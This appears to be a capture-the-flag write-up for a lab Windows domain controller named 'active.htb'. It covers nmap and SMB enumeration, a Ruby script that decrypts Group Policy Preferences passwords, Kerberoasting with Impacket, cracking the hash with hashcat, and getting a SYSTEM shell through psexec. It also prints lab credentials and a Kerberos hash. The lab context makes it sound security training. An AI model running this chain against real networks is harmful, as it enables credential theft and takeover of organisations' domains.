Active
Nmap reveals us that there's many ports open:
nmap -sC -sV -oA nmap/ -T4 10.129.153.112
# Nmap 7.93 scan initiated Wed Jan 11 19:17:50 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.210.76
Nmap scan report for 10.129.210.76
Host is up (0.060s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-11 17:17:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-01-11T17:18:53
|_ start_date: 2023-01-11T17:15:46
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
Based on ports 53 and 88 we are dealing with with Active Directory and most likely a domain controller! Let's start enumerating SMB with smbclient:
joonas@joonas-VirtualBox:~/Documents$ smbclient -L 10.129.210.76 -N
do_connect: Connection to 10.129.210.76 failed (Error NT_STATUS_HOST_UNREACHABLE)
joonas@joonas-VirtualBox:~/Documents$ smbclient -L 10.129.153.112 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
Nice, anonymous login is allowed and we get list of shares. We have no access to most of the shares but luckily Replication is open for everyone. Let's check what's in there with smbclient:
smbclient \\\\10.129.153.112\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 13:37:44 2018
.. D 0 Sat Jul 21 13:37:44 2018
active.htb D 0 Sat Jul 21 13:37:44 2018
5217023 blocks of size 4096. 260059 blocks available
There seems to be one directory, let's download it to our local machine to inspect it more closely. Before we do that, let's set prompt off and recurse on to download files a bit faster:
smb: \> prompt off smb: \> recurse on
smb: \> mget * getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec) getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI
of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.IN
I (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
....
After downloading the files and checking them out there's one file that's interesting: Groups.xml. It contains username and a hashed password:
Apparently this is/was a real thing on Windows according to this article. Windows stored some passwords on Groups.xml file under SYSVOL-folder.
Anyway, let's decrypt the password. For this we will be using this script: (taken from here but modified slightly)
require 'rubygems'
require 'openssl'
require 'base64'
def decrypt(encrypted_data)
padding = "=" * (4 - (encrypted_data.length % 4))
epassword = "#{encrypted_data}#{padding}"
decoded = Base64.decode64(epassword)
key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
aes.decrypt
aes.key = key
plaintext = aes.update(decoded)
plaintext << aes.final
pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion
return pass
end
blah = decrypt(ARGV[0])
puts blah
Save the script as gpp-decrypt.rb and let's run it with ruby:
ruby gpp-decrypt.rb edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
And we get the password: 'GPPstillStandingStrong2k18'
These credentials give us nothing new at first glance, we can't even login to the machine with psexec. One thing we could do is try Kerberoasting using Impacket:
GetUserSPNs.py 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.153.112 -request
And what do you know we get Administrators hash:
joonas@joonas-VirtualBox:~$ GetUserSPNs.py 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.153.112 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 22:06:40.351723 2023-01-16 18:31:01.030538
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9ec0ef6cd7f27876772b33bf18d13ff2$6948732caab053117e7d3a5ddad9c18303a6eae54eee979c8f09c91cb7c404a27687c0b62261b12fede076535fba669aa84bc4e717848d58f683e1e82618c0faf7a7a751fd639c2fcd82d01bcd3fe830260e3f6c79ddf08a391ec6d638463f83f951f823fd4ef278123baed42ecb0ff6ab0f439ca3efa43ac9ee0038b51555e136a6b8af3faf80ba5a12dfa394b0b653eabca4b8db288e103b2f404d885587754422f147ee92a0b6d59e64e53c4d090adc1e4accd3aed45c8e7b0f11beed8fb858462dedd63e137a1b49f40c458472f29e1c7d1158c67341900a109ed98b2c59f7b33f1802130ded3f2d3ecb735a0cc4df9895deac4c0af069f50744c3ca065ce6abf6e7f4ae9fd64b79f1d760053a2d3d4433e3ca7a68eead59148ba176df8fff03208ca6c080ae0d0a2590060592114f7f79329712065ec634ef1dc7a667045bb4b7dabad325f02ce0c3a4037436deb3e09b2017d1283fca6a38313e84e6510faf7db53c9cb7c18ce358092abb7e6f72d95922e2c7e479ab1390e602ab3ac8bd0d44fed0d6bd618d56f22a41be561aa4ff0da4e5ba365b31b04f514be6ed89a73ce0c51dd7902cf50afc1c4e73ea4b7d534e6dfcd87369bebf74cb0eb748f8da89a0ff14fa8569b03468d33496c102645e9a681f89a76d0c627bf2d098812db6fc8e0006d60bae7427d1efdb9530249c2e9541abf8bc439fe43e7432e118fc587acc02a368f40a9ba241898f4c3ba64a19c928e22a9a51b30da165bc7d9aaa6798a6e817aa76ce4c0b14f1b17c3f2ac249c292718c3d99c0abb8e1caeaf3e5c4274c498dca2e052ebfc63e268be04b7ceb6238c921b7ae0c2f7165c7b8ebaa167af68b519f92a12ac54d029b4be6235ac9ec65b6d34bb94e8398c5ee80c5577512311cc4adb7040e56f2e7e019381130fc9ef843b8bba4b0753e983fb7a7e805056a31fed90cfb5f7d101f75782b7b8dcf6058bcda4ce4aeb41a46a17bf3b2eeafbdeedb24e20d1139f564cfe870a24392dcaf69c7dc008b0206a350cf9f068615e10f63a740117302662839600dad7e422a7837bf00f428b1b09bf26ccb2ef28066057a17a115b8c61358b9325ee14b9d834e4b103cc331de5eee41d6169bf2f793cb0b645c9573bc78de98312a267aea7c59d2f0e98da59dbb3e2ce09db420b4d617721af6c4d9e0a46f2f4fbe4251d31a347ed51fd77fa8022f7a878181399fd9ae692092d3f809e2e9df963e79aca19bd0e993e13ff29d
This can be cracked via hashcat, store the hash in file hash.txt and run:
.\hashcat.exe .\hash.txt .\rockyou.txt
The password is 'Ticketmaster1968'. With these credentials we can login to the box via psexec:
psexec.py active.htb/administrator:Ticketmaster1968@10.129.153.112
And we are admin!
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.153.112.....
[*] Found writable share ADMIN$
[*] Uploading file nppuIMaU.exe
[*] Opening SVCManager on 10.129.153.112.....
[*] Creating service Coao on 10.129.153.112.....
[*] Starting service Coao.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system